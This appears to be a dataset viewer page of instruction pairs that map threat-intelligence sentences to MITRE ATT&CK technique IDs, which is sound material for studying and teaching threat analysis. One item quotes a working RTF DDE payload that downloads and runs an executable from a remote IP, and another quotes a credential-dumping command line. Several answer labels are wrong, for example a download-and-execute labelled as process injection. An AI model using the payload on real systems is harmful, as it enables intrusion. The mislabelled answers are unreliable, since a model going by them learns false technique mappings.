text
stringlengths 104
2.24k
|
---|
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s main backdoor connected to a remote C2 server using HTTPS.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic encrypts commands from the C2 server using a hardcoded key.### Assistant: T1573: Encrypted Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware KiloAlfa contains keylogging functionality.### Assistant: T1056: Input Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has enumerated network shares on a compromised host.### Assistant: T1135: Network Share Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera specifically has used the NtdsAudit tool to dump the password hashes of domain users via cmsadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv and used ntdsutil to copy the Active Directory database.### Assistant: T1003: OS Credential Dumping |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used tracert to check internet connectivity.### Assistant: T1016: System Network Configuration Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script saves the decoded and decompressed executable to %APPDATA%\Microsoft\Windows\Templates\WindowsTemplate.exe and creates an LNK shortcut at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk to persistently run WindowsTemplate.exe each time Windows starts up### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch algorithm.### Assistant: T1560: Archive Collected Data |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,For comparison, if we were to inspect Fysbis “RemoteShell” associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant: Figure 4: Sofacy Fysbis non-stripped binary strings referenes to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and – more importantly – further contribute to correlation and detection across related samples### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can perform audio capture.### Assistant: T1123: Audio Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.### Assistant: T1543: Create or Modify System Process |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes can encrypt C2 traffic with AES or RC4.### Assistant: T1573: Encrypted Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may Create Cloud Instance, mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.### Assistant: T1578: Modify Cloud Compute Infrastructure |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,.iqy files are simple text files containing a URL which are opened by default by Excel### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON can use cmd to execute commands on a victim’s machine.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 Example of delivery document The RTF document (8cf3bc2bf…) was very small in size at 264 bytes, which can be seen in its entirety here: {\rtf1{\field{\*\fldinst DDEAUTO "C:\\\\WIndowS\\\\SYsTem32\\\\cMD.eXe " "/C POWErsHELl.eXE -ex BypaSs -NOP -w HIdDen (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp://86.106.131[.]177/link/GRAPH.EXE' , '%apPDAtA%\graph.exe' ) ; saps '%Appdata%\graph.exe'"}}} The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server, save it as an executable file on the system and then execute the payload### Assistant: T1055: Process Injection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,To support their operations, an adversary may need to take capabilities they developed or obtained and stage them on infrastructure under their control.### Assistant: T1608: Stage Capabilities |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used tools to perform keylogging.### Assistant: T1056: Input Capture |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,This means that any domain user can view the SYSVOL share and decrypt the password .### Assistant: T1552: Unsecured Credentials |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.### Assistant: T1553: Subvert Trust Controls |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.### Assistant: T1213: Data from Information Repositories |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.### Assistant: T1595: Active Scanning |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can also search for specific files by supplied file mask.### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages.### Assistant: T1560: Archive Collected Data |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key can identify the IP and MAC addresses of the compromised host.### Assistant: T1016: System Network Configuration Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.### Assistant: T1203: Exploitation for Client Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISAPI extensions and filters may have access to all IIS web requests and responses.### Assistant: T1505: Server Software Component |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has established tmate sessions for C2 communications.### Assistant: T1219: Remote Access Software |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify whether it has been run previously on a host by checking for a specified folder.### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts### Assistant: T1090: Proxy |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,An administrator can also configure a profile that applies to all users and host programs on the local computer.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used JScript for logging and downloading additional tools.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky searches for removable media and duplicates itself onto it.### Assistant: T1091: Replication Through Removable Media |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.### Assistant: T1140: Deobfuscate/Decode Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to check running processes on a targeted system.### Assistant: T1057: Process Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.### Assistant: T1074: Data Staged |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 obfuscates strings and payloads.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,They could subsequently lock others out of the file.### Assistant: T1222: File and Directory Permissions Modification |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.### Assistant: T1578: Modify Cloud Compute Infrastructure |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.### Assistant: T1021: Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten collects the keychains on the system.### Assistant: T1555: Credentials from Password Stores |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode is not encrypted but is obfuscated### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.### Assistant: T1110: Brute Force |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper uses PowerShell to add a Registry Run key in order to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some examples of event types include system startup and user authentication.### Assistant: T1546: Event Triggered Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldFinder has used HTTP for C2.### Assistant: T1071: Application Layer Protocol |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Persona development consists of the development of public information, presence, history and appropriate affiliations.### Assistant: T1585: Establish Accounts |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used batch scripts to download tools and executing cryptocurrency miners.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.### Assistant: T1091: Replication Through Removable Media |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase domains similar to legitimate domains during acquisition of infrastructure to help facilitate Drive-by Compromise.### Assistant: T1608: Stage Capabilities |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.### Assistant: T1070: Indicator Removal on Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.### Assistant: T1553: Subvert Trust Controls |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise.### Assistant: T1608: Stage Capabilities |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT can add a new service to ensure PlugX persists on the system when delivered as another payload onto the system.### Assistant: T1543: Create or Modify System Process |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.### Assistant: T1008: Fallback Channels |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has installed a systemd service script to maintain persistence.### Assistant: T1543: Create or Modify System Process |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has created a fake rm binary to replace the legitimate Linux binary.### Assistant: T1036: Masquerading |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has spread its coinminer via SSH.### Assistant: T1021: Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used VBScript to drop and execute malware loaders.### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.### Assistant: T1003: OS Credential Dumping |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.### Assistant: T1041: Exfiltration Over C2 Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can disable Windows Defender.### Assistant: T1562: Impair Defenses |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can change browser security settings to enable extensions to be installed.### Assistant: T1562: Impair Defenses |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may overwrite data in boot drivers or firmware such as BIOS and The Unified Extensible Firmware Interface to persist on systems at a layer below the operating system.### Assistant: T1542: Pre-OS Boot |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has waited a specified time before downloading a second stage payload.### Assistant: T1497: Virtualization/Sandbox Evasion |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The link provided in the malicious email led to a fake VPN Web Portal: Upon logging in with the credentials provided in the email, the victim is presented with the following page: The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)### Assistant: T1105: Ingress Tool Transfer |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia creates a RAR archive based on collected files on the victim's machine.### Assistant: T1560: Archive Collected Data |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.### Assistant: T1036: Masquerading |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used password spraying to gain access to target systems.### Assistant: T1110: Brute Force |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL uses fake Transport Layer Security to communicate with its C2 server.### Assistant: T1001: Data Obfuscation |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,These sites may also have details highlighting business operations and relationships.### Assistant: T1594: Search Victim-Owned Websites |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.### Assistant: T1543: Create or Modify System Process |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can check the default browser by querying HKCR\http\shell\open\command.### Assistant: T1012: Query Registry |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines.### Assistant: T1496: Resource Hijacking |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives.### Assistant: T1083: File and Directory Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used Nt* Native API functions to inject code into legitimate processes such as wermgr.exe.### Assistant: T1055: Process Injection |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows authentication package DLLs are loaded by the Local Security Authority process at system start.### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1007: System Service Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can add Registry run keys for persistence.### Assistant: T1547: Boot or Logon Autostart Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may break out of a container to gain access to the underlying host.### Assistant: T1611: Escape to Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo can send the data it collects to the C2 server.### Assistant: T1041: Exfiltration Over C2 Channel |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information or Compromise Accounts and/or sending multiple, seemingly urgent messages.### Assistant: T1598: Phishing for Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot collects the users of the system.### Assistant: T1087: Account Discovery |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has also encoded payloads using Base64 and a framework called "Dont-Kill-My-Cat .### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial overlap was based on the filename wmssl.exe, which was seen as an executable name that Cannon would move the wmssl.txt attachment to install and execute a secondary payload### Assistant: T1036: Masquerading |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.### Assistant: T1210: Exploitation of Remote Services |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traps provides endpoint protection, as it can block Excel from creating a command prompt process### Assistant: T1059: Command and Scripting Interpreter |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to receive and execute a self-delete command.### Assistant: T1070: Indicator Removal on Host |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTML5 also introduced a download attribute that may be used to initiate file downloads.### Assistant: T1027: Obfuscated Files or Information |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE uses reg add to add a Registry Run key for persistence.### Assistant: T1112: Modify Registry |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.### Assistant: T1204: User Execution |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has been delivered via spearphishing attachments.### Assistant: T1566: Phishing |
### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has run the xp_cmdshell command in MS-SQL.### Assistant: T1059: Command and Scripting Interpreter |
Subsets and Splits